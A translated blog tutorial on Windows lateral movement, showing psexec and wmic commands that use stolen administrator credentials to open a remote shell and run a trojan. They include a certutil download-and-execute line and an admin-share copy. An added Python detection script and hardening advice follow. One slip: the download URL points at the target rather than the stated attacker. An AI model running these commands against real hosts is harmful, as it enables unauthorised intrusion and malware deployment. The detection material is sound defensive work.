Windows remote command execution

All of the following experiments were run in a workgroup environment.

psexec

psexec.exe \\ip -accepteula -u username -p password program.exe
psexec.exe \\host -accepteula -u domain\username -p password -d -c
# The account and password here are those of the target machine; ip and host are likewise the target host's IP address and hostname.
If it is a domain environment, the command is PsExec.exe \\192.168.23.99 -u test\lisi -p 123 -c cmd

Once you have obtained an account and password for the other host, and that host has port 445 open, you can use psexec to execute remote commands.
psexec \\172.16.99.233 -u administrator -p 123 -c cmd.exe to get a cmd shell
psexec \\172.16.99.233 -u administrator -p 123 -c muma.exe
# The account and password here are those of the target machine; ip and host are likewise the target host's IP address and hostname.

This makes host 172.16.99.233 execute the file muma.exe that lives on 172.16.99.235, i.e. it runs a local file on the remote host. The attacking machine is 172.16.99.235 and muma.exe is stored on that host, but with the command above (-c copies the named program to the target before running it) the file is executed on host 172.16.99.233, achieving remote control.

wmic

Method 1: Control the remote host to download and execute files

wmic /node:172.16.99.233 /user:Administrator /password:123  process call create "cmd /c  certutil.exe -urlcache -split -f http://172.16.99.233/muma.exe c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"

# The account and password here are those of the target machine; ip and host are likewise the target host's IP address and hostname.
The command above connects to 172.16.99.233 and creates a process there. That process uses cmd to run certutil, which downloads the file at http://172.16.99.233/muma.exe, saves it as c:/windows/temp/putty3.exe on the target, and then executes it.

Method 2: Copy local files to the remote host and control the execution of the remote host

copy muma.exe \\172.16.99.233\c$\windows\temp\test.exe  ## copy the trojan file over the admin share (IPC)
wmic /node:172.16.99.233 /user:administrator /password:123 process call create "c:\windows\temp\test.exe"

# The account and password here are those of the target machine; ip and host are likewise the target host's IP address and hostname.
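As an added example (not part of the original post), here is a small Python rule set, run over constructed Sysmon-style events, that flags the host-side traces the psexec and both wmic procedures above leave behind on the target: the PSEXESVC service that psexec installs and starts, child processes of PSEXESVC.exe, processes spawned by WmiPrvSE.exe (the WMI provider host that carries out process call create), certutil -urlcache downloads, and execution out of C:\Windows\Temp. The field names, host and sample events are invented for the example.

```python
import ntpath

# Constructed sample events (Sysmon-like fields, invented for this example; not real logs).
# They mirror what the target host would record during the procedures described above.
SAMPLE_EVENTS = [
    {"host": "172.16.99.233", "kind": "service_install", "service": "PSEXESVC",
     "path": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "172.16.99.233", "kind": "process_create", "image": r"C:\Windows\PSEXESVC.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmdline": "PSEXESVC.exe"},
    {"host": "172.16.99.233", "kind": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\PSEXESVC.exe", "cmdline": "cmd.exe"},
    {"host": "172.16.99.233", "kind": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "cmd /c certutil.exe -urlcache -split -f http://172.16.99.233/muma.exe "
                "c:/windows/temp/putty3.exe & c:/windows/temp/putty3.exe"},
    {"host": "172.16.99.233", "kind": "process_create", "image": r"C:\Windows\Temp\test.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmdline": r"c:\windows\temp\test.exe"},
    # Benign activity that none of the rules should match.
    {"host": "172.16.99.233", "kind": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe"}


def _base(path):
    """Lower-cased file name of a Windows path (works on any OS via ntpath)."""
    return ntpath.basename(path).lower()


def _in_windows_temp(path):
    """True when the path points into \\Windows\\Temp, whichever slash style is used."""
    return "\\windows\\temp\\" in path.lower().replace("/", "\\")


def classify(ev):
    """Return the names of all detection rules that match a single event."""
    hits = []
    if ev["kind"] == "service_install":
        # psexec creates a service named PSEXESVC backed by PSEXESVC.exe on the target.
        if ev["service"].lower() == "psexesvc" or _base(ev["path"]) == "psexesvc.exe":
            hits.append("psexec_service_install")
        return hits
    image, parent, cmd = _base(ev["image"]), _base(ev["parent"]), ev["cmdline"].lower()
    if image == "psexesvc.exe":
        hits.append("psexec_service_binary")
    if parent == "psexesvc.exe":
        hits.append("psexec_child_process")
    # wmic ... process call create runs through WmiPrvSE.exe, so a shell or a binary
    # under Windows\Temp with that parent is the trace of both wmic methods above.
    if parent == "wmiprvse.exe" and (image in SHELLS or _in_windows_temp(ev["image"])):
        hits.append("wmi_remote_process_create")
    if "certutil" in cmd and "-urlcache" in cmd and "http" in cmd:
        hits.append("certutil_download")
    if _in_windows_temp(ev["image"]):
        hits.append("exec_from_windows_temp")
    return hits


def detect(events):
    """Run every rule over a list of events; returns (rule, host, summary) tuples."""
    findings = []
    for ev in events:
        for rule in classify(ev):
            findings.append((rule, ev["host"], ev.get("cmdline") or ev.get("path")))
    return findings


if __name__ == "__main__":
    for rule, host, summary in detect(SAMPLE_EVENTS):
        print(f"{host}  {rule:28s}  {summary}")
```

Legitimate administration also uses psexec and WMI, so these rules are triage signals rather than verdicts; what makes them high-confidence here is the combination on one host (a PSEXESVC install followed by a shell, or WmiPrvSE.exe spawning certutil with a URL). The conditions all three procedures depend on are the ones to remove: a reusable local administrator password (use unique per-host passwords, e.g. via LAPS), reachable port 445 and admin shares from arbitrary workstations, and unrestricted outbound certutil downloads.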

Origin blog.csdn.net/qq_41874930/article/details/108245293